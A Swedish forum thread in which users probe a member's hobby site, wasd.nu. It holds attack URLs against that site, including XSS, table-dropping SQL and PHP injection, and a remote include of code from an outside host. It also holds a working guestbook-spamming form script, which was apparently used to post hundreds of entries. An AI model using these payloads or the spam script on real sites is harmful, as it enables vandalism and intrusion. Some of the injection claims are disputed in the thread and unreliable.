↗ till inläggetDet är bara skräputvecklare som säger så ;) ...Om man har IE får man skylla sig själv.
Annars så använder jag bara Firefox.
↗ till inläggetDet är bara skräputvecklare som säger så ;) ...Om man har IE får man skylla sig själv.
Annars så använder jag bara Firefox.
tycker du det är värt att ha en gästbok om det finns ett forum?
Ja det skadar inte, man kan ju posta där som Gäst till skillnad från forumet.
Jag håller på att programmera Guilds nu! blir nog klart imorgon.
Du har glömt att säkra $_GET['id'] mot SQL-injections.
Visar en popupruta med texten "Skadlig kod"
www.wasd.nu/profile.php?id=<script>alert("Skadlig kod")</script>
Raderar kolumnen MEDLEMMAR
www.wasd.nu/profile.php?id=<?php mysql_query("DROP TABLE MEDLEMMAR"); ?>
Eftersom denna kod inkluderas i ditt script kommer den att köras på din server
www.wasd.nu/profile.php?id=<?php include('http://woodo.zxq.net/XSS.php'); ?>
Tackar! Fixar det så snart som möjligt.
Nu funkar det väl inte längre? Ska bara kolla på vilka andra ställen jag inte säkrat det.
Kan man verkligen skicka in PHP på det viset? Texten som kommer in kommer ju ut i echo, och php som skrivits ut av echo körs inte.
Denna raden:
echo "<?php echo "hej" ?>"
Skriver ut: <?php echo "hej" ?>
Inte hej
http://wasd.nu/profile.php?id=1;DELETE+FROM+MEDLEMMAR
mysql_query('SELECT * FROM MEDLEMMAR WHERE id=1; DELETE FROM MEDLEMMAR');
Där försvann alla medlemmar...
Jag har gjort ett table som heter "test" som du får försöka ta bort, jag lyckas inte göra det på det sättet du påstår.
edit: "test" hette det, inte "asd" som jag skrev tidigare.
Man kan inte köra dubbla queries i PHP 5.
Jag vet faktiskt inte vilken PHP version jag har men jag tror att det är 5.
Lyckas du ta bort "test"? Hur säker är min sida?
Skruva upp svårighetsgraden på botskyddet. ;)
Det här skriptet spammar din gästbok. Cirka 100 inlägg / sekund.
Efter 10 sekunder har skriptet postat 1000 inlägg som du blir tvungen att ta bort manuellt.
<html>
<head>
<script type="text/javascript">
function loadfnc() {
form = document.getElementById('sendthisform');
form.submit();
window.location.reload()
}
window.onload=loadfnc;
</script>
</head>
<body>
<iframe name="formtarget" style="display: none;"></iframe>
<form action="http://wasd.nu/gbok.php" method="post" id="sendthisform" target="formtarget">
<input type='hidden' name='fname' value='test'>
<input type='hidden' name='fmessage' value='test'>
</form>
</body>
</html>
100 per sekund är lite mycket, jag har själv programmerat bottar och 30 per sekund är mer rimligt.
Kanske bäst att fixa ett botskydd då, sätter upp det på att-göra-listan.
Inget händer förresten när jag trycker på din demo-länk. Bara en vit sida och inget nytt i gästboken.
Kolla i din gästbok nu.
Det där var 1 per sekund :P Men jag fixar ett botskydd imorgon.
Om du kör skriptet på din egen dator kan den göra upp till 100 inlägg / sekund.
Jag är ju inte servern. Men om scriptet körs på servern borde det bli nåt sånt ja.
Vem är det som postat 600 inlägg i gästboken? http://www.fuska.se/forum/style_images/ip.boardpr/folder_post_icons/icon2.gif (tagit bort dem nu, sparade en för IP)
↗ till inläggetVem är det som postat 600 inlägg i gästboken? http://www.fuska.se/forum/style_images/ip.boardpr/folder_post_icons/icon2.gif (tagit bort dem nu, sparade en för IP)
Hur vet man om man svarade rätt på uppgiften?:D
Vilken uppgift? Botskyddet när man registrerar sig? Om man svarar fel blir man ju inte medlem.
Vill du vara med i diskussionen?
Bli medlem Logga in